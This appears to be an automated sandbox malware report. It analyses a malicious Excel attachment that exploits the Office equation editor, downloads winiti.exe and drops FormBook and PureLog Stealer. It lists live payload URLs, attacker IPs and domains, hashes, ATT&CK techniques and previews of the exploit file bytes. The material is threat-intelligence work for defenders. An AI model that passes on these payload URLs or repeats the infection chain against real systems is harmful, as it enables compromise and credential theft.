                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1384Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3124Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00910101 rdtsc 10_2_00910101
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_00417A03 LdrLoadDll,10_2_00417A03
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008B0080 mov ecx, dword ptr fs:[00000030h]10_2_008B0080
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008B00EA mov eax, dword ptr fs:[00000030h]10_2_008B00EA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 10_2_008D26F8 mov eax, dword ptr fs:[00000030h]10_2_008D26F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.winiti.exe.680000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.26e505c.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.26e505c.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.443827967.0000000000680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.444323553.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 9.2.winiti.exe.680000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.26e505c.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.26e505c.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.443827967.0000000000680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.444323553.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts33
                Exploitation for Client Execution                		1
                Browser Extensions                		111
                Process Injection                		1
                Masquerading                		OS Credential Dumping12
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media14
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading                		Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Remote System Discovery                		Distributed Component Object ModelInput Capture23
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482907 Sample: RFQ#51281AOLAI.xls Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 41 tny.wtf 2->41 51 Multi AV Scanner detection for domain / URL 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for dropped file 2->55 57 17 other signatures 2->57 8 EXCEL.EXE 57 41 2->8         started        signatures3 process4 dnsIp5 43 104.219.239.104, 49162, 49166, 80 DATAWAGONUS United States 8->43 45 tny.wtf 188.114.96.3, 49161, 49165, 80 CLOUDFLARENETUS European Union 8->45 29 C:\Users\user\...\RFQ#51281AOLAI.xls (copy), Composite 8->29 dropped 31 recreatednewthings...gstohappened[1].doc, Rich 8->31 dropped 12 WINWORD.EXE 337 37 8->12         started        17 winiti.exe 2 8->17         started        file6 process7 dnsIp8 47 tny.wtf 12->47 49 188.114.97.3, 49163, 49164, 49167 CLOUDFLARENETUS European Union 12->49 33 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 12->33 dropped 35 C:\Users\user\AppData\Roaming\...\dGa.url, MS 12->35 dropped 37 ~WRF{D8610C7A-67F1...4-B9ACF1973A7E}.tmp, Composite 12->37 dropped 39 C:\Users\user\AppData\Local\...\1804222C.doc, Rich 12->39 dropped 63 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->63 65 Office viewer loads remote template 12->65 67 Microsoft Office drops suspicious files 12->67 19 EQNEDT32.EXE 12 12->19         started        69 Multi AV Scanner detection for dropped file 17->69 71 Machine Learning detection for dropped file 17->71 73 Injects a PE file into a foreign processes 17->73 23 winiti.exe 17->23         started        file9 signatures10 process11 file12 25 C:\Users\user\AppData\Roaming\winiti.exe, PE32 19->25 dropped 27 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 19->27 dropped 59 Office equation editor establishes network connection 19->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->61 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ#51281AOLAI.xls100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Roaming\winiti.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe48%VirustotalBrowse
                C:\Users\user\AppData\Roaming\winiti.exe48%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                tny.wtf5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://104.219.239.104/80/winiti.exekkC:0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exe0%Avira URL Cloudsafe
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc0%Avira URL Cloudsafe
                http://tny.wtf/dGayX0%Avira URL Cloudsafe
                http://tny.wtf/0%Avira URL Cloudsafe
                http://tny.wtf/dGa0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exej0%Avira URL Cloudsafe
                http://tny.wtf/5%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                tny.wtf
                		188.114.96.3
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://104.219.239.104/80/winiti.exetrue
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doctrue
                • Avira URL Cloud: safe
                		unknown
                http://tny.wtf/dGatrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://tny.wtf/tny.wtf.url.4.drtrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://tny.wtf/dGayX~DFFE8567877254EA13.TMP.0.dr, 1E630000.0.drtrue
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exekkC:EQNEDT32.EXE, 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exejEQNEDT32.EXE, 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.219.239.104
                		unknownUnited States
                		27176DATAWAGONUStrue
                188.114.97.3
                		unknownEuropean Union
                		13335CLOUDFLARENETUSfalse
                188.114.96.3
                		tny.wtfEuropean Union
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482907
                Start date and time:2024-07-26 11:05:48 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 3s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ#51281AOLAI.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@7/25@8/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 87%
                • Number of executed functions: 67
                • Number of non-executed functions: 53
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3044 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                05:07:19API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                05:07:21API Interceptor13x Sleep call for process: winiti.exe modified

                LLM Input / Output

                InputOutput
                URL: Office document Model: gpt-4o
                ```json
{
  "riskscore": 8,
  "reasons": "The screenshot contains a visually prominent section with the Microsoft Office logo and the text 'This document is protected'. This could mislead users into thinking they need to click on a link or button to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attempts. Additionally, the use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The combination of these elements suggests a high risk of phishing."
}

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.219.239.104irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                188.114.97.3#U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/4Gs
                Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                • downloaddining2.com/h9fmdW6/index.php
                Quotation.exeGet hashmaliciousFormBookBrowse
                • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                • www.whatareyoucraving.com/drbb/
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/vMCQY
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                irlsever.docGet hashmaliciousFormBookBrowse
                • www.ninunveiled.shop/y2xs/
                188.114.96.3Quotation.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/jjJsPX
                xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                54.xlsGet hashmaliciousFormBookBrowse
                • tny.wtf/
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/3VC
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                SEL1685129 AMANOS.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • bshd1.shop/OP341/index.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtfQuotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                54.xlsGet hashmaliciousFormBookBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUShttp://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeamGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                https://forms.office.com/r/xULzprLcwHGet hashmaliciousUnknownBrowse
                • 104.18.94.41
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                https://r.emails.wellbeingontheweb.com/mk/cl/f/sh/7nVU1aA2nfuMScRuip3UF1TWed6PxdT/DQvTpig-WhJjGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                invoice.docx.docGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                DATAWAGONUSirlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                CATALOGUE.exeGet hashmaliciousRedLineBrowse
                • 172.81.131.198
                file.exeGet hashmaliciousCMSBruteBrowse
                • 104.219.232.59
                Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                1713283209b718b3402f0849bd96c1191ce385ad0742966accbbfb52b7b95b60820687e4a6909.dat-decoded.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                Vessel Details.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                https://login-no.dynv6.net/login/Get hashmaliciousUnknownBrowse
                • 172.81.131.76
                1N9LML9w7L.exeGet hashmaliciousNeshta, XWormBrowse
                • 104.219.238.14
                CLOUDFLARENETUShttp://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeamGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                https://forms.office.com/r/xULzprLcwHGet hashmaliciousUnknownBrowse
                • 104.18.94.41
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                https://r.emails.wellbeingontheweb.com/mk/cl/f/sh/7nVU1aA2nfuMScRuip3UF1TWed6PxdT/DQvTpig-WhJjGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                invoice.docx.docGet hashmaliciousFormBookBrowse
                • 188.114.96.3

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025609999625234036
                Encrypted:false
                SSDEEP:6:I3DPcsdzavxggLR5qN4ggtfJC3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPtd4A/vYg3J/
                MD5:73F40E7DA641C385E1AA45A33C2778A0
                SHA1:1818A6A6DF4CE34A7B57C5405FEBAE5922543DEF
                SHA-256:7B856D63BC0E9DD5C4EBE33E92AA290D4223F9E35F84A0B06C6BC9D788D36E66
                SHA-512:03DBC069DC2AB8EB09B3313F1656B765B8D1F3CBCE1A6610E844A46C047665F6DC92A0BDDC6010D42516E5C995540C5FFFE45A74C1A84BC12E2EBE4CB1644320
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z..w...MK........S,...X.F...Fa.q............................n.:.38.D..`T............4.{~.w@.....re.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):84055
                Entropy (8bit):2.564253730925419
                Encrypted:false
                SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                MD5:0A9C028203A8416BE8DB7371550D0FB5
                SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

                Download File
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):951296
                Entropy (8bit):7.752827643333699
                Encrypted:false
                SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                MD5:1F5C95D40C06C01300F0A6592945A72D
                SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Virustotal, Detection: 48%, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.doc

                Download File
